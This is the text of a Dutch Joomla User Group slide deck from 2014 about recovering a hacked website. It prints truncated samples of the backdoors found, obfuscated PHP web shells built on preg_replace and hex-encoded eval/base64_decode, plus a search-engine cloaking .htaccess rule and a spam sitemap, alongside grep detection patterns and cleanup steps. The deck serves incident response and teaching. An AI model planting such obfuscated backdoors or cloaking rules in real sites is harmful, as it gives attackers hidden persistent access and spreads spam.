Upload
peter-martin
View
352
Download
2
Tags:
Embed Size (px)
DESCRIPTION
Bij een routine controle ontdekte Peter dat de website van een klant enkele vreemde nieuwe bestanden bevatte. Na enkele grondige scans ontdekte hij dat de website was "gehacked". Wat te doen als je website is gehackt? In deze presentatie (gegeven bij Joomla User Group Den Bosch) bespreekt Peter waarom websites worden gehackt, toont hij enkele website hacks, en laat zien hoe je een website kunt herstellen.
Citation preview
Help mijn siteis gehackt... wat nu?
door Peter Martin www.db8.nl / @pe7er
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
1.Waarom hacken?
2.Website gehackt
3.SSH connectie
4.Procedure– Backup
– Analyse
– Herstel
Website gehackt
Waarom hacken?
1. Credit Cards
2. Informatie
3. Graffiti
4. Phishing
5. SPAM
6. Backlinks
7. DDOS
8. CPU
9. Handel
Website gehackt
Website gehackt 1
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Website gehackt 1
Klant
Hosting Provider
opencoffeewebsite
is gehackt
?!?!Andere sites,
zelfde IP ook!?!
(laconiek) gewoonindex.php
terugzetten
Hierbij zeg ik mijn hosting op, asap!
Website gehackt 2
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Website gehackt 2
Klant website
Fabrik
?!?!from: @ .brto: @ .br !?!
E-mail bouncedpaar dagen
Spam script, tijdstipin access log
Front-end upload:Bestandsformaatniet toegestaan!
Website gehackt 3
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Website gehackt 3
Klant
SSH op website
Backup,(just in case)
?!?! verschil groottevorige backup?
Verdachte phpbestanden &
viagra sitemap.xml
Ik admintoegang opwebsite?
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 1
/includes/xmlrpc.php - 07 september 2014 23:15:01<?php# GNU LESSER GENERAL PUBLIC LICENSE# Version 3, 29 June 2007# # Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> # Everyone is permitted to copy and distribute verbatim copies# of this license document, but changing it is not allowed. [..]## You should have received a copy of the GNU General Public License# along with this program. If not, see <http://www.gnu.org/licenses/>$auth_pass = "52fd812f55cb3118bb3bfe575b59a02d";$color = "#df5";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66 \x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPUNGlm4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBsoDeXKainkKVZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHBM+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MLlqWOHOtQw5fJRbyFoQ
Niet in backup van 18 oktober 2014 !
Gehackt op 19 oktober 2014
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Payload 1
.htaccess - 09 november 11:45:48RewriteEngine OnRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR]RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
### @package Joomla# @copyright Copyright (C) 2005 2014 Open Source Matters. All rights reserved.# @license GNU General Public License version 2 or later; see LICENSE.txt##
Toegevoegd
Hack via backdoor door 2e hacker
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Payload 2
main.php - 10 juli 2013 11:25:27<?php Error_Reporting(0); $xTBYAB76GYfo="rRgNb9pINsmlkm88FKyALcceuFM36xyYbdASOBpMe4FEhCapvQV74nL1b0il/v97b8Y2BkKSSudIwZ55X/O+5/38EUW9Pm96w07Tu3B//vAIMYjTZIpBqKY3/Gkw/vlDq3N/6bS85h9e811y5rqnThu+nMFHr+cmJ5PreNTqeW4c8L/9/PHzB4dnqZK3FZXyK/7vDcyzfgtwxptgKiXUqBplRvx0ETk/4nu9qkoAhzClalrMj8vlchjP43j+NGzNvvPTL7GDm0rNso2aqemwn6jMKhG2sEzdtDVTXygVk9RMaz+0jFoiaCnEsJiqGgTBbV21DJ0yna4AVEbeMuLYhgSpUKpcRlESrjDDJFKpSWhJiQCLGbqj1nRyf38fKhVFEimRqqOzMhBYoUn2Jq2kOy9TkaIUpFCNqkmO2H6oMxrpBrXVqMHosamyLWRpXU1VGfWXVFECYcQlrSkoAgoGi2NcUZR9hspNXER8w1lVZQjLkUC9pFtUA+HYnqZS1U/UfdUBng5lNcWxNZJsEd6E8NFUvEC3AOvDvm7WmO84o07Xc5xAAoMc6HEoAVCh+[..]+jPuv0ZCSPco4yHZS4goVte05ZaSQG+kdELd9Sz2YzKa3nwIRHiW9qulHKSSXNiggPBGFb0SQPUZPP4iNUBuLj2JSJG6RItv9Dw==";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doeVRXeEdkbHByYkRSVV[..]
Hack via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
preg_replace("/.*/e","eval(base64_decode('
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Payload 3
sitemap.xml - 9 november 2014 11:50:42<?xml version="1.0" encoding="UTF8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://www.voorbeeld.nl/viagraprofessional100mg/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/longtermsideeffectsofcialis/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/priceofviagra100mgtablet/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url></urlset>
Hack via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
590 spam links
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 2
/libraries/joomla/session/cache.php 19 augustus 2013 14:45:46 <?php Error_Reporting(0); $x0bp6Rx0vRH="vRhrb9s28K+71VLHDtCsfmRTggC2GUOijFo1LWlA3CY/oAX6F0ZDZWWlk5ols9MmLnZHUrLkR5btw5w4Eo/34r2Z9x8Mz6Oe2SIB9Zhrd5N5unz/4f2HqU+8N8Qzx/A0rS6xmbgXL6Zm22j9bLRO+ctG48hswsqsPjP2G/xEUrkdkXwOPNI1BxbrDxM+84nTOaNs5vJYbPJMU/FOSutS2nUIiKhU620j51Vi9UziALPzrm9d9T1r5BDvvNrzf6LsSm2eH5CeawWWx2zi+ec5xdUBPXNhe8hYcI4c/MDtAbFm8qh2K92YNyag2kRqHIxZx5XgRqupNJ52CXNc+7UPQE5tDsDpgPZwNecSQ8Bn2nO9e+a5g8RnnumRwLH6JOGj0SjiMefxmo1f1tpg3WgFbRm/NI12w2y2DvlJit7KuQ56Nwm+IPAj/E4Diw2VrF30GbnElPT4phnIHd97M/S3eV9ptlxHg1Mx6tAR8RINlNzwveP4CiE/dojHDuMwjLfjSo3UKgqvnFArhrHh+j5hyZQFgfYTGwSoO1AhEI0Pj0sivdFA+08EcXyCuAIZdMZ2n7nUNsmF6zM/4f6lb4ILTUYGgQlm5BuM1zESab8C3wJuAvu2NSCJaVYO64ZpKl9NdAC5neSz60smGVEUzsIoP+0sBPHIdPAakMROrHh+fX2dZnu0mucJwFJtpXWW1AkIoFOCpcYzyW8OKhuUr9if4Dv38D";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXN
via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
preg_replace("/.*/e","eval(base64_decode('
Aangepast!
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 3
/administrator/fs-login.phtml - 09 november 2014 11:45:48<?php Error_Reporting(0);$xJdU8NfauOq="5b1rdxrH0igs2Y4kHxzLkmXLlix7EGQmWsuKGcjAwDDR79gfvJftABLYRuzMaIIQxH/9VFXf54KQk/0871kve8eC7urq6lt1dVV19cQrW91S1XOceBgnn+rNVvNL89PXL+f93z987Xsf67Xfvw4+1Qet8+bvNTe5/Ne/J63AD2yE/rNW/0gpNbfulX2r5LWsMOhAVlR3er3fIz2v7Lgl7zfvLeRadtnVs1pdz3ZcC8vdDzu1oOJc9wcf+1j8X/8O6/Mrt121TueT0ubOxr2dje3o1drag9I6/Co9e7pzsBY9XCzid//6dwyfCdRjP2u4HQsb5Nm2dzpPngZBw3eTaZxs+mW7il9ebh48Dyz8Fnolz251w2PXxp8/ep2a+xa/bXjtpg+Ji0uGGiip2m6j1PasVnce3UTxLA7bVT+oufPo52iq172AvOgmxMRVqMZP1/Vqrj0nsJv+rBd/6H2IDwIr3g3KnVokqMCP+za0+M+Tf/37BLtpL+yEJejEeeTadmCX/KARTQ/WX7zAcioTkksE4ETTnpnV9t6W3Lduq4xjWLLCtitAIJt+l/ywHVpzldj2GmGr9FM5sFynZJc7CMSzYWzDDvTL/c3DErR+8+jwADojGsw+UktoXBtpFI1qa8465X293GGTCRA4lh1WHd9zuq4zn9CYMqD3tmuV7U4cOiU20iLzMxt5wF4lEnQMOCYcbBznoQby3kOfvp+UHhxursEsypBAGWJAJqX9w8M3Rzu5gCwLQWmUZKsqTvAiaISdOWtILXTnyQXMrtjzw0Zn2II55Nqji3pgt+O2a3WD2rAaONboASzUSmDXxvFF2KmWrdg6rbrDKk+NO16b/Rrp2U65CeMWH3t+2R1Go1E0urhBzPAHqhwlWfKwIa7VCoIzIGxyBj12rFYYb9T25OwhtHlyzPshU0Bg1VawZDZq6kNu6OAEZL26HWE2rI34jz/iebv2MZM+hDo1PGpVGESzksbSewVoAMFUL05TkZERz68EIbyBxTiAjJ9/jleCjK+K6FVzQOspmD8W8NcKcAIYNvg1f/DqQelwc9qbni+o8Ukl7CQLnJ8BsrgIfiKndH3HVYmd8C1jnxPHq7ulNvAoSKb [..]N1BmC06baOOvUABzLnQQOPayaWUZNuVsvz/RKeu0tYqggU6iMX1/8L";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNj
via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
preg_replace("/.*/e","eval(base64_decode('
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backdoor 4-9
Toegevoegd op 09 november 2014 11:45:48
/language/comnon.phtml /layouts/fedit.php /libraries/fedit.php/logs/comnon.php/plugins/fs-login.phtml/tmp/Iicense.php
bevat:
<?php Error_Reporting(0);
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28
via backdoor door 2e hacker,op 9 november 2014 toegevoegd.
Gevolg
SSH connectie
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Terminal
Text Terminal
“TTY” TeleTYpewriter
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Terminal
Windows– SSH programma: PuTTY
Mac OSX– Ingebouwd: “Terminal”
Linux– Ingebouwde Terminal Emulator
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
SSH
Secure SHell
gebruikt public-key cryptografie (authenticatie & veilige data communicatie)
peter@computer:~$ ssh [email protected]
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
SSH
peter@computer:~$ ssh [email protected]
The authenticity of host 'example.com (93.184.216.119)' can't be established.RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33.Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'example.com,93.184.216.119' (RSA) to the list of known [email protected]'s password:
Procedure
Backup
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Backup files
Backup van voor de hack?– Hosting partij?
– Akeeba backup (offline)?
Maak backup van huidige situatie (inclusief hack!)– Akeeba backup
– Rsync / MySQL dump
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
rsync
Remote synchronization– rsync van “bron” naar “doel”
$ rsync -arv [email protected]:~/joomla-cms/ /var/www/joomla-cms-backup/
gebruikersnaam@ server : folder
gebruikersnaam@ server : folder
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
MySQL Dump
MySQL Dump
$ mysqldump -u gebruikersnaam -p databasenaam > bestand-met-sql-uitvoer.txt
Analyse
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Analyse
● Software versies:– CMS (Joomla versie?)
– Versies 3rd party extensies?
● Access Logfiles– Vreemde POST requests?
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Analyse
● Nieuwe bestanden op server– .php files in /images/ map?
● Bestanden met vreemde code– Base64 decode
● Vergelijk bestanden met originele bestanden– diff
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Nieuwe bestanden
Aangemaakt in de laatste 7 dagen:
find . -type f -ctime -7
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Recent gewijzigd
Gewijzigd tussen 7 en 3 dagen geleden:
find . -type f -mtime -7 ! -mtime -3
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
grep
● Zoek naar specifieke teksten
grep -r "eval" /var/www/joomla-cms | grep "base64_decode"
● Of
grep -r "preg_replace" /var/www/joomla-cms | grep "\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28"
grep -r "eval" /var/www/joomla-cms | grep "<?php Error_Reporting(0);”
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
NeoPi
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
NeoPi
Detectie van verborgen web shell codeBenodigd Python 2.6
Installeer via git:
$ git clone https://github.com/Neohapsis/NeoPI.git
Start script:
$ /var/www/NeoPI/neopi.py -Aa /var/www/joomla-cms
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
diff
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
diff
Vergelijk bestanden van website met originele bestanden:
– Zorg voor map met originele Joomla + extensies● Oude backup of● Nieuwe installatie Joomla + extensies
– Zorg voor map met gehackte website
Gebruik diff software om te vergelijken:
– Linux + OSX: Meld
– Windows: WinMerge
Herstel
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Herstel
● Verwijderen alle hacker scripts– Kijk verder dan “hack” ivm backdoor scripts
● Alle software up-to-date brengen– Joomla
– 3rd party extensions
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Herstel
● Wachtwoorden vervangen– MySQL database wachtwoord
– FTP wachtwoord
– Wachtwoorden van Joomla gebruikers
● Evt extra controle:– Backup schoon gemaakte website
vergelijken met nieuwe Joomla installatie → diff
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Herstel
● Eigen .xml sitemap aanmelden bij Google
● Spam pagina's sneller uit zoekmachines?
"410 Gone error" via .htaccess:
RewriteRule \S*viagra+\S* [G]RewriteRule \S*cialis+\S* [G]RewriteRule \S*pharmacy+\S* [G]RewriteRule \S*propecia+\S* [G]RewriteRule \S*drugs+\S* [G]
Conclusie
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
1.Waarom?
2.Website gehackt
3.SSH connectie
4.Procedure– Backup
– Analyse
– Herstel
Conclusie
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Vragen?
Peter Martin
e-mail: info at db8.nl
website: www.db8.nl
twitter: @pe7er
Presentatie: http://www.db8.nl
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Used PhotosTitel sheet:
Guy Fawkes Mask - Ben Fredericson, 2009http://commons.wikimedia.org/wiki/File:Guy_Fawkes_Mask.jpg
1. Waarom hacken?Question mark (3534516458) - Marco Bellucci, 2005http://commons.wikimedia.org/wiki/File:Question_mark_(3534516458).jpg
Credit-cards - Lotus Head, 2005 http://commons.wikimedia.org/wiki/File:Credit-cards.jpg
Pickpocket girl - Lunch Photography, 2008 http://commons.wikimedia.org/wiki/File:Pickpocket_girl.jpg
Graffiti-Sokolov5 - Orange.man, 2008 http://commons.wikimedia.org/wiki/File:Graffiti-Sokolov5.JPG
Phishing - Stomchak, 2010 http://commons.wikimedia.org/wiki/File:Phishing.JPG
Spam 2 - Bodo Akdeniz, 2005 http://commons.wikimedia.org/wiki/File:Spam_2.jpg
Plugboard wires - Daniel Sancho, 2005http://commons.wikimedia.org/wiki/File:Plugboard_wires.ds.jpg
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Used PhotosWAC telephone operators operate the Victory switchboard during the Potsdam Conference in their headquarters in - U.S. National Archives and Records Administration, 1945http://commons.wikimedia.org/wiki/File:WAC_telephone_operators_operate_the_Victory_switchboard_during_the_Potsdam_Conference_in_their_headquarters_in..._-_NARA_-_199007.jpg
Butterfly Labs Bitcoin miner - arstechnica.com, 2013http://cdn.arstechnica.net/wp-content/uploads/2013/05/IMG_6048-Version-3.jpg
Cirencester, market place - Tony Grist, 2008http://commons.wikimedia.org/wiki/File:Cirencester,_market_place.jpg
2. Hacked
Youve-been-hacked, Hanonen, 2014http://commons.wikimedia.org/wiki/File:Youve-been-hacked.jpg
Piedbiche - Isabelle Grosjean, 2001http://commons.wikimedia.org/wiki/File:Piedbiche.jpg
3. SSH connectie
Switchboard Manual - Peel Conner, Geez-oz, 2012http://commons.wikimedia.org/wiki/File:Switchboard_Manual_-_Peel_Conner.JPG
Bundesarchiv Bild 183-2008-0516-500, Fernschreibmaschine mit Telefonanschluss - Illger, Willi, 1930http://commons.wikimedia.org/wiki/File:Bundesarchiv_Bild_183-2008-0516-500,_Fernschreibmaschine_mit_Telefonanschluss.jpg
Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014
Used Photos4. Procedure
Motorola M6800 manuals - Michael Holley, 2010http://commons.wikimedia.org/wiki/File:Motorola_M6800_manuals.jpg
BackupIBM 7330 on white background, Crisco 1492, 2013http://commons.wikimedia.org/wiki/File:IBM_7330_on_white_background.jpg
AnalysePostcards and magnifying glass, Anna, 2007http://commons.wikimedia.org/wiki/File:Postcards_and_magnifying_glass.jpg
Magnifying glass on antique table - Stéphane Magnenat, 2008http://commons.wikimedia.org/wiki/File:Magnifying_glass_on_antique_table.jpg
Magnifying glass - Faberge - shakko, 2011http://commons.wikimedia.org/wiki/File:Magnifying_glass_-_Faberge.jpg
Binary Code, Cncplayer, 2013http://commons.wikimedia.org/wiki/File:Binary_Code.jpg
Two different shoes on, Kelly Bailey, 2007http://commons.wikimedia.org/wiki/File:Two_different_shoes_on.jpg
HerstelIBM 650 at Texas A&M open for repair - Cushing Memorial Library and Archives, Texas A&M, 2009http://commons.wikimedia.org/wiki/File:IBM_650_at_Texas_A%26M_open_for_repair.jpg
Conclusie
EquinoxeJuniorHighPac-Man - Equinoxe, 2012http://www.c64-wiki.com/index.php/File:EquinoxeJuniorHighPac-Man.png